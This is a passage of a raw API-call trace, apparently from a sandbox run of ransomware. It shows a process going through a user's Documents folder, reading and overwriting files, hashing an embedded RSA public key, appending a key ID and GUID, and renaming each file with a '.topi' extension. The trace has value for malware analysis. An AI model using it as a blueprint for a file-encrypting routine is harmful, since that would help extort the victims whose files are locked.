[0094.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9240 | out: hHeap=0x680000) returned 1 [0094.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9228 | out: hHeap=0x680000) returned 1 [0094.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6ebf78 | out: hHeap=0x680000) returned 1 [0094.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb510 | out: hHeap=0x680000) returned 1 [0094.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0094.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0094.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0094.907] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f72d8*, nNumberOfBytesToWrite=0x6c59, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f72d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x6c59, lpOverlapped=0x0) returned 1 [0094.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f72d8 | out: hHeap=0x680000) returned 1 [0094.907] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x6c5e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.907] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.908] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.908] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.908] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.908] CloseHandle (hObject=0x6a8) returned 1 [0094.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0094.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.922] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\b HXAcX9_11Ge0W8.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b hxacx9_11ge0w8.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\b HXAcX9_11Ge0W8.pptx.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b hxacx9_11ge0w8.pptx.topi")) returned 1 [0094.923] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.923] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.923] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.925] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b41c0 | out: hHeap=0x680000) returned 1 [0094.925] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc19be2c0, ftCreationTime.dwHighDateTime=0x1d5a5ff, ftLastAccessTime.dwLowDateTime=0xf37642b0, ftLastAccessTime.dwHighDateTime=0x1d54c0c, ftLastWriteTime.dwLowDateTime=0xf37642b0, ftLastWriteTime.dwHighDateTime=0x1d54c0c, nFileSizeHigh=0x0, nFileSizeLow=0xc96e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bfG0Lb5W.docx", cAlternateFileName="BFG0LB~1.DOC")) returned 1 [0094.925] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.925] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e) returned 0x31b41c0 [0094.925] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.925] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bfG0Lb5W.docx") returned=".docx" [0094.925] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bfG0Lb5W.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bfg0lb5w.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.925] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=51566) returned 1 [0094.925] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.929] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xc948, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.929] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.930] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.930] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.930] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.930] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xc96e, lpOverlapped=0x0) returned 1 [0094.931] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.931] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.931] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.931] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.932] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.932] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.932] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.932] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.932] GetLastError () returned 0x0 [0094.932] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.932] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.932] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.932] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.933] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc970) returned 0x99f72d8 [0094.933] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x6ebf78 [0094.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9228 [0094.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x6ebf30 [0094.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9240 [0094.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9270 [0094.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9288 [0094.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.934] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9270 | out: hHeap=0x680000) returned 1 [0094.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9288 | out: hHeap=0x680000) returned 1 [0094.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0094.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9288 [0094.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0094.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9270 [0094.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0094.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9288 | out: hHeap=0x680000) returned 1 [0094.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9270 | out: hHeap=0x680000) returned 1 [0094.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0094.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.935] GetCurrentThreadId () returned 0x8c4 [0094.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f54a0 [0094.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.935] GetCurrentThreadId () returned 0x8c4 [0094.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb510 [0094.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9270 [0094.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0094.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9288 [0094.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9258 [0094.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.938] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bfG0Lb5W.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bfg0lb5w.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bfG0Lb5W.docx.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bfg0lb5w.docx.topi")) returned 1 [0094.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.939] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b41c0 | out: hHeap=0x680000) returned 1 [0094.940] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33b5d190, ftCreationTime.dwHighDateTime=0x1d5c27a, ftLastAccessTime.dwLowDateTime=0x5eba4ff0, ftLastAccessTime.dwHighDateTime=0x1d5be2a, ftLastWriteTime.dwLowDateTime=0x5eba4ff0, ftLastWriteTime.dwHighDateTime=0x1d5be2a, nFileSizeHigh=0x0, nFileSizeLow=0x1705c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cMmcblZ.pps", cAlternateFileName="")) returned 1 [0094.941] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cMmcblZ.pps") returned=".pps" [0094.941] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cMmcblZ.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cmmcblz.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.941] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=94300) returned 1 [0094.941] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.944] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x17036, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.944] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.946] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.947] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.947] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.947] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.947] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.947] 